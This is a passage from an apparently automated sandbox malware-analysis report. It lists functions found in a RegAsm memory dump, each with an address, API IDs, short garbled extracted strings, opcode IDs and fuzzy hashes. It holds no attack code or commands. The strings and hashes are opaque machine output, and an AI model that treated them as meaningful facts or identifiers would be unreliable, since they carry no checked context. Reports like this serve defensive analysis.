                                        • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                        • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96
                                        Function 0042B763 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 308COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: 3$qjjw
                                        • API String ID: 3664257935-3235754969
                                        • Opcode ID: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                        • Instruction ID: e0248e225440bb7285b8803733d60271f7e61eb44642cbaa2f092a8799675a72
                                        • Opcode Fuzzy Hash: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                        • Instruction Fuzzy Hash: 29A16C717083919BE7248F24C8917ABBBD2EFD2340F18856ED5C94B3C6DB384405D796
                                        Function 004280B0 Relevance: 5.4, Strings: 4, Instructions: 440COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '|$-.$12$i>}0
                                        • API String ID: 0-2215797287
                                        • Opcode ID: 14e10f65ad8321b80ffaa5da7a8a4b0c9f74e6b5be133c58881cb5dac5cd0c39
                                        • Instruction ID: 8eb2e6b3675630783b81e0cc301adcc701fe371486659d4b9ed52cc1e956938d
                                        • Opcode Fuzzy Hash: 14e10f65ad8321b80ffaa5da7a8a4b0c9f74e6b5be133c58881cb5dac5cd0c39
                                        • Instruction Fuzzy Hash: 0FD1ED7220C3118FD718CF29D89179FB7E2EFC1314F15892DE4958B281EB78950ACB96
                                        Function 0043533A Relevance: 5.4, Strings: 4, Instructions: 405COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `$a$b$c
                                        • API String ID: 0-1877310501
                                        • Opcode ID: a9c6c59b3ed1c792c943f583d7b073ffa41b41ed4492c6662d551fa54f329e35
                                        • Instruction ID: 3c49db235e8ab65d0d0325bcf5be7f0773c557a123825650d4b9bdb7a00939e4
                                        • Opcode Fuzzy Hash: a9c6c59b3ed1c792c943f583d7b073ffa41b41ed4492c6662d551fa54f329e35
                                        • Instruction Fuzzy Hash: DE128F20508FD2DED326C73C8848745BF913B67328F088399D4E55BBD2C3A9A565C7E6
                                        Function 00415ADC Relevance: 5.4, Strings: 4, Instructions: 398COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1/3T$WL$^Q$neA
                                        • API String ID: 0-3205570823
                                        • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                        • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                        • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                        • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                        Function 004097B0 Relevance: 5.4, Strings: 4, Instructions: 396COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: DC1DC1D8A16E672B23D904AF30EFEBBC$EIFT$_P$w
                                        • API String ID: 0-2101701731
                                        • Opcode ID: 75d97640b3faaac57dd24be4c61a62bd06a513c5caf22db02b2c8c010e917981
                                        • Instruction ID: d6c9ba6df74010c44a12fa1b015f50b5a98841c64097f62a202da139de979759
                                        • Opcode Fuzzy Hash: 75d97640b3faaac57dd24be4c61a62bd06a513c5caf22db02b2c8c010e917981
                                        • Instruction Fuzzy Hash: 9DC125716083409BD718DF35C8526AFBBE6EBD1314F188A2DE4D297392DA3CC909CB56
                                        Function 00426170 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: 4zVc$8zVc$YNMZ$cba`
                                        • API String ID: 2994545307-1799417857
                                        • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                        • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                        • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                        • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                        Function 00418731 Relevance: 4.1, Strings: 3, Instructions: 330COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: lfpu$t~x}$tuv
                                        • API String ID: 0-2272480740
                                        • Opcode ID: 5ae6ecf5c8bb09ee68a8b92dc996563c67039a06e37478c5de5135c619cc173a
                                        • Instruction ID: e048a5bc52b34c826fc5f58021b05f3e6481ac49658e5248bf4fd3d772931afd
                                        • Opcode Fuzzy Hash: 5ae6ecf5c8bb09ee68a8b92dc996563c67039a06e37478c5de5135c619cc173a
                                        • Instruction Fuzzy Hash: 0CA157B5600601CFD711CF25DC82B6377A2FF96314F1985ADE4468B3A2EB38E841CB59
                                        Function 00418FAD Relevance: 4.1, Strings: 3, Instructions: 307COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: B? !$Z7]9$t3]5
                                        • API String ID: 0-3999537062
                                        • Opcode ID: 0cf34332a4bf5ac9417df9c94bdf918d256be1bc8dad18685bd4c2ad9d159837
                                        • Instruction ID: 72aafdab4af179e30fb4efeb0aca3c27bbb7d088d5539880c917271914cfd205
                                        • Opcode Fuzzy Hash: 0cf34332a4bf5ac9417df9c94bdf918d256be1bc8dad18685bd4c2ad9d159837
                                        • Instruction Fuzzy Hash: 3481D471500712CBD724CF25C8A16A3B7F2FF96760B19C69EC4864FB55E739A882CB44
                                        Function 004192BA Relevance: 4.0, Strings: 3, Instructions: 300COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: B? !$Z7]9$t3]5
                                        • API String ID: 0-3999537062
                                        • Opcode ID: 73ac118eafa2c0b9157b74d59e9ae57acea3c53c65c112bf242875409304cb73
                                        • Instruction ID: 4772a6b4140a06dcfab1e209944608f824a99ddab1fd18c5bc6537220b9c3e42
                                        • Opcode Fuzzy Hash: 73ac118eafa2c0b9157b74d59e9ae57acea3c53c65c112bf242875409304cb73
                                        • Instruction Fuzzy Hash: F481F4716007128BC325CF29C4916A3F7B2FFA9754B1AC65EC4860F761E339AC82C798
                                        Function 0042BFDA Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 461COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: x
                                        • API String ID: 3664257935-2363233923
                                        • Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                        • Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
                                        • Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                        • Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57
                                        Function 0040D44C Relevance: 3.9, Strings: 3, Instructions: 187COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$OK$P
                                        • API String ID: 0-279604475
                                        • Opcode ID: 15ca00153eb2250557c4211e580d213dc21f231b4513146c676bd93c0b65a243
                                        • Instruction ID: dcd2adf5ba7def60fdbdfda857df2c127c7e65c023c39cfee20c62017944ea30
                                        • Opcode Fuzzy Hash: 15ca00153eb2250557c4211e580d213dc21f231b4513146c676bd93c0b65a243
                                        • Instruction Fuzzy Hash: 7C514972E583904AD334CB39CC827EFB6D29BD6304F09C97DC48DA7345EA3819098746
                                        Function 00420717 Relevance: 3.4, Strings: 2, Instructions: 854COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: B:@<$F>?0
                                        • API String ID: 0-4011826714
                                        • Opcode ID: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                        • Instruction ID: 92ed06d7aa227fc4673e4b6d33fedd1ff2714f2f2b1d0eb8acbab6dee258af69
                                        • Opcode Fuzzy Hash: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                        • Instruction Fuzzy Hash: E43256B1A00721CBCB24CF24C892267BBB1FF92310F59825DD8825F796E779A851CBD5
                                        Function 00404BA0 Relevance: 3.3, Strings: 2, Instructions: 815COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$8
                                        • API String ID: 0-46163386
                                        • Opcode ID: f6efbbce20de2b023d6cb677cdd126fc4c2fcca28c45f4f5bbedd8c93d3440d6
                                        • Instruction ID: 0f615e6785466e28a5f93bf1c1a09b996c0b6f7065c9dd489095df40342ff1f6
                                        • Opcode Fuzzy Hash: f6efbbce20de2b023d6cb677cdd126fc4c2fcca28c45f4f5bbedd8c93d3440d6
                                        • Instruction Fuzzy Hash: AA7236716083409FD714CF18C880B9BBBE1AFD5314F48892EF9899B391D779D948CB96
                                        Function 0043A3F0 Relevance: 3.2, Strings: 2, Instructions: 711COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: cba`$f
                                        • API String ID: 2994545307-1109690103
                                        • Opcode ID: ce77e257ab17708985b033a1a28936955ee8b7280a2f22a7d825b70f4c086311
                                        • Instruction ID: 41f0f5caafdb7b8250f40a2fa5a9f5d8922839f2072142bbb4c85c591d71526d
                                        • Opcode Fuzzy Hash: ce77e257ab17708985b033a1a28936955ee8b7280a2f22a7d825b70f4c086311
                                        • Instruction Fuzzy Hash: 9E2224716483419FD314CF28C880B2BBBE2ABD8304F29992EE4D687392D775D915CB97
                                        Function 0042C6D7 Relevance: 3.1, Strings: 2, Instructions: 614COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '$iJ
                                        • API String ID: 0-30662343
                                        • Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                        • Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
                                        • Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                        • Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97
                                        Function 00414F08 Relevance: 3.1, Strings: 2, Instructions: 609COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =UA$cba`
                                        • API String ID: 0-2849403845
                                        • Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                        • Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
                                        • Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                        • Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A
                                        Function 00422270 Relevance: 3.0, Strings: 2, Instructions: 501COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TU$c!"
                                        • API String ID: 0-3813282519
                                        • Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                        • Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
                                        • Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                        • Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A
                                        Function 00422CF8 Relevance: 2.9, Strings: 2, Instructions: 399COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cba`$cba`
                                        • API String ID: 0-1405727707
                                        • Opcode ID: 5c84bb8c798b0e41572f15b67f755068686cedca86a3ad616f5ad894ab6612f1
                                        • Instruction ID: cf914851eadaaefefd268cafab99a3ed5656e84c3113c822c7bea81855011779
                                        • Opcode Fuzzy Hash: 5c84bb8c798b0e41572f15b67f755068686cedca86a3ad616f5ad894ab6612f1
                                        • Instruction Fuzzy Hash: 2BD1F034609202DFD708DF25EC51A2AB3F6FB99706F19887CE58683291D738EE51CB49
                                        Function 00427C9D Relevance: 2.9, Strings: 2, Instructions: 357COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: <vB$cba`
                                        • API String ID: 0-498934516
                                        • Opcode ID: d4f623a5fb0a0c8f92519baea591e51ccb09485aaf33c8d24cde6aecc2ef88d5
                                        • Instruction ID: da3196872b256321ec34466f7baf0807fde79cf67f05401d592e0b2ad76434be
                                        • Opcode Fuzzy Hash: d4f623a5fb0a0c8f92519baea591e51ccb09485aaf33c8d24cde6aecc2ef88d5
                                        • Instruction Fuzzy Hash: 29B107B5A087248FD718CF28E85172BB7E2ABC5304F4A857DD9968B392DB349C01DB85
                                        Function 00404270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: )$IEND
                                        • API String ID: 0-707183367
                                        • Opcode ID: bc4bf555bbeff42da8388944a93aac8362fee21b005dad154d3f6f1e39364d8b
                                        • Instruction ID: 4afb57b326d3e49d9fc8e0a24ea4f70629e8547001b2e63d72ffbe4a7bfc289b
                                        • Opcode Fuzzy Hash: bc4bf555bbeff42da8388944a93aac8362fee21b005dad154d3f6f1e39364d8b
                                        • Instruction Fuzzy Hash: 42D1C2B1A08344AFD710CF14D84575FBBE4AB94308F14492EFA99AB3C1D779D908CB96
                                        Function 00409070 Relevance: 2.8, Strings: 2, Instructions: 292COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: &$(-$(,"-
                                        • API String ID: 0-2940422652
                                        • Opcode ID: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
                                        • Instruction ID: ae70fb115a879a18d64fb530bcee3728d6c7b0029ca7c8029ea195d6610fa6e3
                                        • Opcode Fuzzy Hash: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
                                        • Instruction Fuzzy Hash: A571066110C3868ED7158F29949077BBFE19FE2304F1849BEE4D5AB383D739890AC766
                                        Function 00423A00 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "=B$vw
                                        • API String ID: 0-457850316
                                        • Opcode ID: 051963b576788cf0d88f3c6bd725d199eeee0da8a148a68b8bbb1709fcb4336e
                                        • Instruction ID: f315680c62e70f20da2e1c8123195ba5c4b2be5aa43e99e7c1204dac969b8674
                                        • Opcode Fuzzy Hash: 051963b576788cf0d88f3c6bd725d199eeee0da8a148a68b8bbb1709fcb4336e
                                        • Instruction Fuzzy Hash: BA91327220C3548BD314CF68EC81B5BBBE1FBC5318F154A3DF9985B281D7B599058B86
                                        Function 0041BA48 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %$BzJ
                                        • API String ID: 0-1159491165
                                        • Opcode ID: d50dfa369b2cabffe8d628b0ac0056a4e2c295f14812191870c99ff4e33fffd4
                                        • Instruction ID: 15970c7872f0f24117a588b544366ad47cb00c5e8ff479cf6d2c6aa966492e42
                                        • Opcode Fuzzy Hash: d50dfa369b2cabffe8d628b0ac0056a4e2c295f14812191870c99ff4e33fffd4
                                        • Instruction Fuzzy Hash: 5551277450C3828BD7158B3994617B7BFE1DFA3305F68045DE0C287693DB2A854ACBAB
                                        Function 0041D074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pr$|~
                                        • API String ID: 0-4145297803
                                        • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                        • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                        • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                        • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                        Function 0041D087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pr$|~
                                        • API String ID: 0-4145297803
                                        • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                        • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                        • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                        • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                        Function 004376B0 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c!"$cba`
                                        • API String ID: 0-3815079656
                                        • Opcode ID: 5399830b24d0c7c21206e2b52d5cb164668a13b1fa724a81154e92aaa802a904
                                        • Instruction ID: d439ba287dcba63c8f7a659613d28fe1dbaf1e7a7a1ec41ac89f2e19b51e5e51
                                        • Opcode Fuzzy Hash: 5399830b24d0c7c21206e2b52d5cb164668a13b1fa724a81154e92aaa802a904
                                        • Instruction Fuzzy Hash: AF51387464C300ABE324EF25EC81B2B77A6FBD9304F15582DE1C687241D778AC01DBAA
                                        Function 0042536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BLJB$X
                                        • API String ID: 0-2222927247
                                        • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                        • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                        • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                        • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                        Function 00427653 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H.s $ij
                                        • API String ID: 0-4017226643
                                        • Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                        • Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
                                        • Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                        • Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46
                                        Function 00415EE0 Relevance: 1.9, Strings: 1, Instructions: 625COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: 1/3T
                                        • API String ID: 2994545307-3266294232
                                        • Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                        • Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
                                        • Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                        • Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
                                        Function 00437900 Relevance: 1.7, Strings: 1, Instructions: 497COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cba`
                                        • API String ID: 0-1926275841
                                        • Opcode ID: 3f29fd3a069bb16d361132c5aa8a0ede2e0d2aaea110744ff23cb538c4bc5ae4
                                        • Instruction ID: 14714d2ba1fa74e4959dcbafcfb1335b2d24fab57e9a1ae0764d95646eda8daf
                                        • Opcode Fuzzy Hash: 3f29fd3a069bb16d361132c5aa8a0ede2e0d2aaea110744ff23cb538c4bc5ae4
                                        • Instruction Fuzzy Hash: 47C177B590C3144BD330EF15D8C162BB7A2AF99314F0A962DE9C657352E738AC05CBDA
                                        Function 00414A40 Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: K%
                                        • API String ID: 0-424693878
                                        • Opcode ID: 37b01ca38506eb230e9e43b73d8b4a05ed4a32d3362ed536e1d7410f5922aec2
                                        • Instruction ID: 7540c4282cdacfbe722bd69171a89485793de9a2a526d887569807fd05c65936
                                        • Opcode Fuzzy Hash: 37b01ca38506eb230e9e43b73d8b4a05ed4a32d3362ed536e1d7410f5922aec2
